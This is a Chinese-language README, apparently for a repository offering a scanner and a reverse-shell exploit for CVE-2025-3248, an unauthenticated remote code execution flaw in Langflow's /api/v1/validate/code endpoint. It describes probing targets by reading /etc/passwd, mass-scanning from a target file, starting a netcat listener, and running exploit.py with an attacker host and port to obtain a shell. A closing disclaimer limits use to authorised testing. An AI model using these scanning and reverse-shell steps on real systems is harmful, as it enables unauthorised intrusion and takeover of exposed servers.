此仓库包含两个 Python 脚本:
LangflowCheck.py:一个扫描器,用于检查存在 CVE-2025-3248 漏洞的 Langflow AI 实例。exploit.py:一个可用的反弹 Shell 利用脚本,适用于存在漏洞的 Langflow 目标。CVE-2025-3248 是 Langflow AI 中的一个严重漏洞,它允许未认证的攻击者通过向 /api/v1/validate/code 发送特制 payload 来远程执行任意 Python 代码。
LangflowCheck.py/etc/passwd 的无害 payload 来检查目标是否存在漏洞。exploit.pylhost)和监听端口(lport)。exploit.log。pip install -r requirements.txt
单个 URL
python3 LangflowCheck.py --url http://target.com --output vulnerable_target.txt

多个目标
python3 LangflowCheck.py --file targets.txt --output vulnerable_targets.txt

首先,启动一个监听器
sudo nc -nvlp 4444

然后,运行利用脚本:
python3 exploit.py --target http://target.com --lhost YOUR_IP --lport 4444

如果目标存在漏洞,你将收到一个 Shell。

此利用脚本仅用于教育和授权安全测试。请勿将其用于你不拥有或未经明确授权测试的系统。